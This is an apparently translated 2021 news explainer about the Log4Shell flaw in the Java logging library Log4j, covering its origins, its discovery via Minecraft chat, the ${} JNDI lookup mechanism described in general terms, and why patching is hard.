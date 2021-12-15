The image that we publish below is making the rounds of all the IT communities around the world: it tells, in an ironic way, what is happening with what has been defined by far as the most serious IT flaw in recent years.

The image is easy to understand if a person is aware that today the modern world, if we talk about the technological part, is based on the open source: the operating systems and software used on each device integrate dozens of libraries that are developed and maintained by both companies and volunteers, who started a project because they needed it and then decided to release it to make sense of this project and make life easier for others too.

Today nobody reinvents the wheel: programming is a creative job, but part of this job is also knowing how to choose libraries and parts of code already written, tested and safe to add functions that, if written from scratch, would require a lot of time and a lot of risks.

If any of these libraries have a serious problem, everything collapses.

Log4J is one of these libraries, and it was not created as the cartoon says by a person who lives in Nebraska but by a Swiss developer, Ceki Gülcü, who then passed it on to the Apache Software Foundation.

We are facing what is perhaps the most used “log” library in the Java world, and today it is estimated in the world there are at least 3 billion devices that take advantage of this library.

One of these is Minecraft, and it is thanks to Minecraft that the devastating flaw in Log4J was discovered that will ruin the holidays for many IT managers and that it has created, and is creating, a series of enormous problems.

Someone said that we are facing a possible cyber catastrophe, and although the exaggerations should always be taken with a grain of salt when we have explained how it works, and also the ease with which it can be exploited now that it is public, we can understand that we are really facing an enormous risk.

Giants like Apple, Microsoft, Google and Oracle have already started updating the library to the correct version, but before they did, their systems were still vulnerable for some time. There are those who have managed, for example, to change the name on iCloud.

We talked about Minecraft because for a few weeks there were players in China who they could play pranks on other players simply by sending strings of code into the game’s chat. The chat is managed with Log4J, and it took a little while for some security researchers to raise the alarm. It was thus discovered that one of the most used libraries in the world had a devastating design error inside for some time, and that someone, as Minecraft demonstrates, was already exploiting it.

The bug is very simple: Log4J should show and manage only text strings, but when it is in front of a message formatted in a particular way it interprets it as an internet address, reaches it using the Java Naming and Directory Interface, downloads the payload and executes it with the privileges of the main program. In practice it was enough to insert a command inside the characters $ {} to transform it into an executed command.

The diagram below clearly shows the flow, and all an attacker has to do is insert the string somewhere, it will surely be saved in some “log”, and set up a server that is called by Log4J to load the malware that the server will download and execute.

In the days following the discovery, some security companies intercepted thousands of bots that tried to search the network for vulnerable devices, servers of all kinds, to upload malware, steal data, install cryptocurrency mining tools and much more.

Some have begun to insert filters on the type of call, to mitigate the effects of the attack: many CDN owners have started, for example, to block and filter some messages considered dangerous.

A sort of disaster announced, for several reasons: on the one hand we are talking about a logging library and on many live servers you have to be very careful, because what at the same time represents an attack vehicle it is also the only tool available today to know if anyone is exploiting that flaw. The update therefore requires attention.

Furthermore, in many cases this library in the updated version requires some dependencies that may not be satisfied by those who use very old versions of the software: if some can update in one day, for others it may take weeks, months, for others the bug may remain open for always with all the risks involved.

Java is used in the enterprise environment, and Log4J is a huge threat. They assigned it a value of 10/10 as a degree of criticality, only because more could not be given. However, there is no doubt: it is the most serious cyber threat of the last decades.